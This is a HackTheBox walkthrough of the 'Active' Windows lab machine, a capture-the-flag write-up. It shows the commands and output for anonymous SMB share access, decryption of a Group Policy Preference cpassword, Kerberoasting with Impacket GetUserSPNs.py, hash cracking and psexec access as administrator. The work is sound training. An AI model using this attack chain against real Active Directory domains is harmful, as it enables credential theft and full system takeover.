Hack The Box

HackTheBox “Active” Walkthrough

Active, an easy-level Windows OS machine on HackTheBox, started by discovering an open SMB share, initiating a journey through various stages of exploitation. Unveiling a Group Policy Preference password within the…

Active, an easy-level Windows OS machine on HackTheBox, started by discovering an open SMB share, initiating a journey through various stages of exploitation. Unveiling a Group Policy Preference password within the share led to decryption, ultimately revealing the Administrator user’s hash. Employing brute-force tactics, the hash was cracked, granting authentication as SYSTEM and enabling seamless maneuvering through the system.

HackTheBox “Active” Walkthrough, figure 1

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

┌──(kali㉿kali)-[~/Desktop]└─$ sudo nmap -T4 -A -p- 10.10.10.100[sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 17:03 ESTWarning: 10.10.10.100 giving up on port because retransmission cap hit (6).Nmap scan report for 10.10.10.100Host is up (0.11s latency).Not shown: 65329 closed tcp ports (reset), 183 filtered tcp ports (no-response)PORT      STATE SERVICE       VERSION53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)| dns-nsid: |_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-16 22:27:17Z)135/tcp   open  msrpc         Microsoft Windows RPC139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)445/tcp   open  microsoft-ds?464/tcp   open  kpasswd5?593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636/tcp   open  tcpwrapped3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)3269/tcp  open  tcpwrapped5722/tcp  open  msdfsr?9389/tcp  open  mc-nmf        .NET Message Framing47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.049152/tcp open  msrpc         Microsoft Windows RPC49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.049158/tcp open  unknown49165/tcp open  unknown49170/tcp open  unknown49171/tcp open  unknownAggressive OS guesses: Microsoft Windows Server 2008 R2 (98%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows 8 (96%), Microsoft Windows 7 (96%), Microsoft Windows Vista Business (96%), Microsoft Windows Vista SP0 or SP1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Vista SP2 (96%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windowsHost script results:| smb2-time: |   date: 2024-02-16T22:28:23|_  start_date: 2024-02-16T21:21:46| smb2-security-mode: |   2:1:0: |_    Message signing enabled and requiredTRACEROUTE (using port 3389/tcp)HOP RTT       ADDRESS1   105.65 ms 10.10.14.12   103.78 ms 10.10.10.100OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1607.76 seconds

Numerous open ports and running services were detected including SMB, revealing the OS as Microsoft Windows Server 2008 R2 SP1, with the domain name “active.htb” noted. To facilitate access, the domain will be appended to /etc/hosts.

Now, we will list the SMB shares anonymously.

HackTheBox “Active” Walkthrough, figure 2

And we found the share “Replication”.

┌──(kali㉿kali)-[~/Desktop]└─$ smbclient //active.htb/ReplicationPassword for [WORKGROUP\kali]:Anonymous login successfulTry "help" to get a list of possible commands.smb: \> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  active.htb                          D        0  Sat Jul 21 06:37:44 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \> cd active.htbsmb: \active.htb\> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018  Policies                            D        0  Sat Jul 21 06:37:44 2018  scripts                             D        0  Wed Jul 18 14:48:57 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\> cd Policiessmb: \active.htb\Policies\> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 06:37:44 2018  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 06:37:44 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  GPT.INI                             A       23  Wed Jul 18 16:46:06 2018  Group Policy                        D        0  Sat Jul 21 06:37:44 2018  MACHINE                             D        0  Sat Jul 21 06:37:44 2018  USER                                D        0  Wed Jul 18 14:49:12 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINEsmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  Microsoft                           D        0  Sat Jul 21 06:37:44 2018  Preferences                         D        0  Sat Jul 21 06:37:44 2018  Registry.pol                        A     2788  Wed Jul 18 14:53:45 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferencessmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  Groups                              D        0  Sat Jul 21 06:37:44 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groupssmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>

After exploring around, I discovered “group.xml” in a specific directory. Let’s download the file to examine its contents.

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir  .                                   D        0  Sat Jul 21 06:37:44 2018  ..                                  D        0  Sat Jul 21 06:37:44 2018  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018                5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xmlgetting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit                                                                                                                                                                                                                                            ┌──(kali㉿kali)-[~/Desktop]└─$ cat Groups.xml <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>

We discovered the username “active.htb\SVC_TGS” and its encrypted password, tagged as “cpassword.” Utilizing the tool “gpp-decrypt,” a Ruby program included in Kali Linux by default to decrypt it.

HackTheBox “Active” Walkthrough, figure 3

Using the obtained credentials (SVG_TGS:GPPstillStandingStrong2k18), we’ll attempt to access the Users share.

HackTheBox “Active” Walkthrough, figure 4

The Impacket collection includes a script named GetUserSPNs.py, designed to identify Service Principal Names (SPNs) linked to a specific user account. Running this script with the discovered credentials allows access to the requested valid Ticket-Granting Service (TGS) sets associated with these SPNs.

┌──(kali㉿kali)-[~/Desktop/impacket/examples]└─$ ./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -requestImpacket v0.12.0.dev1+20240208.120203.63438ae7 - Copyright 2023 FortraServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation --------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-02-16 16:22:52.552948             [-] CCache file is not found. Skipping...$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$513817c4ac3cb618e26dcafd5c878e75$1a544ba6d87282ffe667f68e2680b0826d17aacb79ec775e425004be7dd9040b876516dcb743406f94425e20d523a8850d3e312989a78a50229b6402bd1e0aa18700c9335f5b06f7a76234b1500e72be11941b3547a545c5569123ce52b89a6bd68fe734eb525144a67a7d3b2e670df9426cabf4097e86b2f3e5c9b9eb49d7d4703e9b71f419b2c9bc718796fe65ee3d7930204b9def01b1e291bfdce9aa9c9d9078a5bd7b4b02479db39ea0732980ffc25d1431bf78078a7a0e826eccc5c87b7c471381c357fc98d3c595d6002ca476cbbf00ed6875398bd7e29f88081aaf053eb95d98b004f879f8c827ad4824e30d6e34b2e7ca1bd9bcd07aec2cf377ead5ac96804e4347dab86572d8d5bb2f3ca8f49a1edfe04a496e393f0b5c2c7d75ab1c382f75e313520ed6ccf8a1308fc1dc7b224f4db6797e7258b5e365b9604fd6331b4a0e64f34c292d7be533ace40b4f744ba230237f04b551143da6ab2477b1e54748007d974416b420578f78baa1b8250394f5701aceef36f4e1796adba1b20670f838034accd6040e1113b23deaa97a85bc3d5498ab1e69b104a98c2db9fef145e1674dab64cb1c5c2c4185ffb6304074ca74a2148d3617a8d8f6f3a646ee73cc3bd8478812da5c49e1736b4ffbb28dae3747c5bfe8809de4642e64d51956c21438b7636c9f9f7ff578c12b483546dbfe74ab6093c175713ee963bd267da590fe76d028d78ae7f4d5c3117f8d534e290d7d164119e1d6544c1949f0c8cf3ee9888041e18350d20df6c35f4c1af1e1fdf825470ddc84ca06524f6fe76cbde63712a66dc6f98939d73a157528d0e8fe68afda6b8c691faad7bd5fc367d38ce052f1d3c31c0a2cf9a40ee728858b3f8ae840f30d50b5eef77c71170e454ac13e54d9c86dee447f8c8d1ba31b0e481d52ab19beb5b3e2dd9a43da84741b47053e770f6f4645a6e313bd382d8af22c66aee9b8c777ed4caec3814982f8a1024d5808386958c3609296b4b093db2519a0d4204d0d1c5fd8d8ca9d925754c15496a0c2513115cca8e1f3dd7796eb11de75ab4c10ab8522ceeadc2bc5fd57884b0a2edb8e3e286a7c3c6e20d4515c98e9cb7929243b4eb07b8bcd6f6b9db8b1e40b0666dc5fad04809b4db7a497a265d283fa6042c7c333eb4be75fb9355902c41270949c169108fb7a70ef60685e1e1e7ddc05496de069af6dadf2d8f5110ad9997365fc39785355f60d8f6ee54a436d8039d8b0938d5fdae4e908a7

We obtained a TGS from an Administrator SPN, our next step is to crack it and potentially escalate privileges. Let’s proceed using John The Ripper.

HackTheBox “Active” Walkthrough, figure 5

To access as the administrator, we’ll utilize psexec.py.

HackTheBox “Active” Walkthrough, figure 6

Cheers.